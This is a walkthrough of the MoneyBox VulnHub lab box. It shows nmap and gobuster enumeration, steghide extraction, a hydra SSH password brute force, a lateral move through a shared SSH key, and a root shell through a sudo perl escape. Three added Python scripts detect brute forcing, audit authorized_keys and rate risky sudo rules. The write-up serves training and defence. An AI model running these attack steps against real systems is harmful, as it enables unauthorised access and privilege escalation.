MoneyBox : 1 Vulnhub Walkthrough
Initial Enumeration and User Shell
As usual, I started with an nmap scan looking for open ports and running services.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ nmap -sC -sV -oA nmap/initial 192.168.1.2
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 23:04 IST
Nmap scan report for 192.168.1.2
Host is up (0.00085s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 1093656 Feb 26 08:48 trytofind.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
| 256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_ 256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MoneyBox
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.59 seconds
We have an FTP server running on port 21, SSH on port 22 and an Apache web server on port 80. Port 21 allows anonymous login, so I started enumerating it first. Enter the username anonymous, leave the password field empty and press enter.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ ftp 192.168.1.2
Connected to 192.168.1.2.
220 (vsFTPd 3.0.3)
Name (192.168.1.2:madhav): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1093656 Feb 26 08:48 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
226 Transfer complete.
1093656 bytes received in 0.10 secs (10.5665 MB/s)
ftp> exit
221 Goodbye.
We have an image named trytofind.jpg, which looks like this:
We can see some white marks on the image, which suggests that this image has some data hidden within it. We can use steghide to extract the hidden data. I tried extracting the data with steghide using an empty passphrase, but that did not work, which means we need to find the passphrase before we can extract anything from the image.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ steghide --extract -sf trytofind.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
Next, I started enumerating port 80 to see if we could find the passphrase there:
There is nothing interesting on the home page, and I checked the page source as well but did not find anything useful. Next I ran a gobuster scan to look for hidden files or directories and found a directory named /blogs.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ gobuster dir -u http://192.168.1.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.zip,.jpg,.js,.css
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.2
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: zip,jpg,js,css,php,html,txt
[+] Timeout: 10s
===============================================================
2021/03/05 23:12:07 Starting gobuster
===============================================================
/index.html (Status: 200)
/blogs (Status: 301)
/server-status (Status: 403)
===============================================================
2021/03/05 23:27:18 Finished
===============================================================
After visiting the /blogs directory I again checked the page source and, scrolling down, this time found a secret message.
I visited the /S3cr3t-T3xt directory and in its source code found another comment, which contained the passphrase we wanted.
I used this to extract the data from trytofind.jpg using steghide, and this time I got a data.txt.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ steghide --extract -sf trytofind.jpg1
Enter passphrase:
wrote extracted data to "data.txt".
After reading the contents of data.txt, I found a username renu and the hint that renu is using a weak password, so we brute force the SSH login.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ cat data.txt
Hello..... renu
I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......
Next, I used hydra to brute force the login password and found the password 987654321.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.1.2 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-05 23:30:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.2:22/
[22][ssh] host: 192.168.1.2 login: renu password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-05 23:30:26
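A hydra run like the one above leaves an unmistakable trace on the target: a burst of "Failed password" lines in /var/log/auth.log from one source address, followed by an "Accepted password" for the account that was guessed. The script below is an added example for defenders, not part of the original walkthrough or of the MoneyBox box: it parses constructed sshd log lines, counts failures per source inside a sliding window, and raises a second, higher-priority alert when a login succeeds while such a burst is still inside the window. The sample log lines, the threshold of five failures and the 60-second window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in /var/log/auth.log format (sample data, not taken from the box).
SAMPLE_AUTH_LOG = """\
Mar  5 23:30:05 MoneyBox sshd[1201]: Failed password for renu from 192.168.1.3 port 40112 ssh2
Mar  5 23:30:05 MoneyBox sshd[1202]: Failed password for renu from 192.168.1.3 port 40114 ssh2
Mar  5 23:30:06 MoneyBox sshd[1203]: Failed password for invalid user admin from 192.168.1.3 port 40116 ssh2
Mar  5 23:30:06 MoneyBox sshd[1204]: Failed password for renu from 192.168.1.3 port 40118 ssh2
Mar  5 23:30:07 MoneyBox sshd[1205]: Failed password for renu from 192.168.1.3 port 40120 ssh2
Mar  5 23:30:07 MoneyBox sshd[1206]: Failed password for renu from 192.168.1.3 port 40122 ssh2
Mar  5 23:30:08 MoneyBox sshd[1207]: Accepted password for renu from 192.168.1.3 port 40124 ssh2
Mar  5 23:31:40 MoneyBox sshd[1300]: Failed password for lily from 10.0.0.9 port 51000 ssh2
Mar  5 23:35:12 MoneyBox sshd[1301]: Accepted publickey for lily from 10.0.0.9 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_events(log_text):
    """Turn sshd auth lines into dicts; lines that are not login results are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; only the relative ordering matters here
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "method": m["method"],
                       "user": m["user"], "src": m["src"]})
    return events


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failures inside the window, and any login
    that succeeds from such a source while the burst is still inside the window."""
    failures = defaultdict(list)   # source address -> timestamps of recent failures
    flagged = set()                # sources already reported (one bruteforce alert each)
    alerts = []
    for ev in parse_events(log_text):
        recent = [t for t in failures[ev["src"]]
                  if (ev["ts"] - t).total_seconds() <= window_seconds]
        failures[ev["src"]] = recent
        if ev["result"] == "Failed":
            recent.append(ev["ts"])
            if len(recent) >= threshold and ev["src"] not in flagged:
                flagged.add(ev["src"])
                alerts.append({"type": "bruteforce", "src": ev["src"],
                               "failures": len(recent), "ts": ev["ts"]})
        elif len(recent) >= threshold:
            # The guess that worked: an accepted login right after the burst.
            alerts.append({"type": "success_after_bruteforce", "src": ev["src"],
                           "user": ev["user"], "method": ev["method"], "ts": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

On the sample data the script reports 192.168.1.3 once it reaches five failures and then reports the accepted password login for renu from the same address; the single failure from 10.0.0.9 followed by a key-based login minutes later produces nothing. The "success after burst" alert is the one worth paging on, since it means the guessing worked rather than merely happened.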
We can now log in via SSH using the username renu and password 987654321.
┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ ssh renu@192.168.1.2
The authenticity of host '192.168.1.2 (192.168.1.2)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.2' (ECDSA) to the list of known hosts.
renu@192.168.1.2's password:
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
renu@MoneyBox:~$ ls
ftp user1.txt
renu@MoneyBox:~$ cat user1.txt
Yes...!
You Got it User1 Flag
==> us3r1{F14g:0ku74tbd3777y4}
renu@MoneyBox:~$
Privilege Escalation
Next, I checked for other users on the box and found a user lily. I checked the .ssh directory of user lily and found that user renu's key was added to the authorized_keys file.
renu@MoneyBox:/home/lily/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIiVrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlvIVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 renu@debian
This means that user renu can log in directly as user lily via SSH without a password. So I switched to user lily using the following command and got our second flag:
renu@MoneyBox:/home/lily/.ssh$ ssh lily@192.168.1.2
The authenticity of host '192.168.1.2 (192.168.1.2)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.2' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$ ls
user2.txt
lily@MoneyBox:~$ cat user2.txt
Yeah.....
You Got a User2 Flag
==> us3r{F14g:tr5827r5wu6nklao}
lily@MoneyBox:~$
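The lateral move from renu to lily worked because one account's key sat in another account's authorized_keys, which is exactly the kind of thing an audit should catch before an attacker does. The script below is an added example and not part of the original walkthrough or of the box itself: it parses authorized_keys and *.pub files (options field, key type, blob, comment), fingerprints each key the way OpenSSH does (SHA256 of the decoded blob, base64 without padding), and reports keys in one account's authorized_keys whose fingerprint matches a key found in another local account's own *.pub file. The home-directory snapshot is constructed in memory and the key blobs are well-formed but non-functional placeholders; the secondary "comment names a different account" check is a weaker heuristic and is an assumption of this example.

```python
import base64
import hashlib
import shlex

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ssh-dss",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def _sample_blob(key_type, seed):
    # Constructed key material in SSH wire format (length-prefixed strings). It is NOT a
    # usable key; it only gives each sample key a distinct, well-formed blob to fingerprint.
    def field(b):
        return len(b).to_bytes(4, "big") + b
    body = hashlib.sha256(seed.encode()).digest()
    return base64.b64encode(field(key_type.encode()) + field(body)).decode()


# Constructed snapshot of ~/.ssh for two accounts (sample data, not the real MoneyBox files).
SAMPLE_HOMES = {
    "renu": {
        "id_rsa.pub": f"ssh-rsa {_sample_blob('ssh-rsa', 'renu-key')} renu@debian\n",
        "authorized_keys": "",
    },
    "lily": {
        "id_ed25519.pub": f"ssh-ed25519 {_sample_blob('ssh-ed25519', 'lily-key')} lily@MoneyBox\n",
        "authorized_keys": (
            "# keys allowed to log in as lily\n"
            f"ssh-rsa {_sample_blob('ssh-rsa', 'renu-key')} renu@debian\n"
            f'from="10.0.0.0/8",command="/usr/local/bin/backup" '
            f"ssh-ed25519 {_sample_blob('ssh-ed25519', 'backup-key')} backup@ops\n"
        ),
    },
}


def fingerprint(b64_blob):
    """OpenSSH-style SHA256 fingerprint: base64 of the digest of the decoded blob, unpadded."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Parse authorized_keys / *.pub lines into options, key type, fingerprint and comment."""
    keys = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)            # keeps quoted options such as command="..." whole
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            continue                          # malformed line: no key type or no key blob
        keys.append({
            "options": tokens[:idx],          # everything before the key type (from=, command=, ...)
            "type": tokens[idx],
            "fingerprint": fingerprint(tokens[idx + 1]),
            "comment": " ".join(tokens[idx + 2:]),
        })
    return keys


def audit_homes(homes):
    """Report keys in one account's authorized_keys that belong to another local account."""
    owner_of = {}                              # fingerprint -> account whose *.pub file holds it
    for user, files in homes.items():
        for name, content in files.items():
            if name.endswith(".pub"):
                for key in parse_authorized_keys(content):
                    owner_of[key["fingerprint"]] = user
    findings = []
    for user, files in homes.items():
        for key in parse_authorized_keys(files.get("authorized_keys", "")):
            owner = owner_of.get(key["fingerprint"])
            if owner and owner != user:
                findings.append({"user": user, "issue": "cross_account_key",
                                 "fingerprint": key["fingerprint"],
                                 "detail": f"key owned by {owner} grants login as {user}"})
            elif not key["options"] and "@" in key["comment"] and key["comment"].split("@")[0] != user:
                # Weaker signal: comment names a different account and no from=/command= restriction.
                findings.append({"user": user, "issue": "unrestricted_foreign_key",
                                 "fingerprint": key["fingerprint"], "detail": key["comment"]})
    return findings


if __name__ == "__main__":
    for f in audit_homes(SAMPLE_HOMES):
        print(f"{f['user']}: {f['issue']} ({f['fingerprint']}) {f['detail']}")
```

On the sample snapshot the only finding is renu's key inside lily's authorized_keys; the restricted backup key is left alone because its from= and command= options pin what it can do. On a real host you would build the dict by reading /home/*/.ssh, and the fingerprints printed here are the same ones ssh-keygen -lf would show, so findings can be cross-checked by hand.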
Root Shell
Gaining a root shell was quite easy. I ran the sudo -l command and found that user lily can run /usr/bin/perl as root.
lily@MoneyBox:/home$ sudo -l
Matching Defaults entries for lily on MoneyBox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lily may run the following commands on MoneyBox:
(ALL : ALL) NOPASSWD: /usr/bin/perl
I checked on GTFOBins and found that we can spawn a root shell by using the following command:
lily@MoneyBox:/home$ sudo perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@MoneyBox:/home#
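The root step comes down to one sudoers line: an interpreter allowed as root, with NOPASSWD and no arguments pinned, which is equivalent to granting root outright. The script below is an added example for auditing sudo -l output and is not part of the original walkthrough or of the box: it parses the rules block into run-as user, tags and commands, then rates each command, treating an interpreter, shell, editor or pager with unrestricted arguments as critical and one with fixed arguments as high (those can often still drop to a shell, which is why GTFOBins lists them). The sample sudo -l output and the list of risky binaries are constructed assumptions.

```python
import os
import re

# Binaries that hand over arbitrary command execution once run as root (constructed list,
# covering the usual interpreters, shells, editors and pagers; extend it for your estate).
RISKY_BINARIES = {
    "perl", "python", "python2", "python3", "ruby", "php", "lua", "node",
    "sh", "bash", "dash", "zsh", "env", "find", "awk", "vi", "vim", "nano", "less", "more",
}

# Constructed `sudo -l` output in the shape seen on the box (sample, not the real listing).
SAMPLE_SUDO_L = r"""Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
    (root) /usr/sbin/service apache2 restart
    (root) NOPASSWD: /usr/bin/less /var/log/syslog
"""

# "(runas) TAG: TAG: command, command" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Return the command rules from `sudo -l` output; the Defaults block is skipped."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        rules.append({
            "runas": m["runas"].strip(),
            "tags": [t.rstrip(":") for t in re.findall(r"[A-Z]+:", m["tags"])],
            "commands": [c.strip() for c in m["cmds"].split(",")],
        })
    return rules


def audit_rules(rules):
    """Rate each permitted command: interpreters without fixed arguments are the worst case."""
    findings = []
    for rule in rules:
        nopasswd = "NOPASSWD" in rule["tags"]
        for cmd in rule["commands"]:
            if cmd == "ALL":
                findings.append({"command": cmd, "binary": "ALL", "runas": rule["runas"],
                                 "nopasswd": nopasswd, "severity": "critical",
                                 "reason": "any command as the run-as user"})
                continue
            parts = cmd.split()
            binary = os.path.basename(parts[0])
            if binary not in RISKY_BINARIES:
                continue
            unrestricted = len(parts) == 1          # no arguments pinned in the rule
            findings.append({"command": cmd, "binary": binary, "runas": rule["runas"],
                             "nopasswd": nopasswd,
                             "severity": "critical" if unrestricted else "high",
                             "reason": ("arbitrary arguments allowed" if unrestricted
                                        else "fixed arguments, but the program can still escape to a shell")})
    return findings


def audit_sudo_output(output):
    return audit_rules(parse_sudo_l(output))


if __name__ == "__main__":
    for f in audit_sudo_output(SAMPLE_SUDO_L):
        print(f"[{f['severity']}] {f['command']} (runas {f['runas']}, nopasswd={f['nopasswd']}): {f['reason']}")
```

On the sample the perl rule is rated critical, the less rule high, and the service restart with fixed arguments is not reported. The fix on the real box is the same in every case: remove the interpreter from sudoers, or wrap the one task lily needs in a dedicated script with a fixed path and no user-controlled arguments.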
Hurray! We are root, and now we can read our final flag, which is in root's home directory.
root@MoneyBox:~# cat .root.txt
Congratulations.......!
You Successfully completed MoneyBox
Finally The Root Flag
==> r00t{H4ckth3p14n3t}
I'm Kirthik-KarvendhanT
It's My First CTF Box
instagram : ____kirthik____
See You Back....
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alexey Kuvaldin.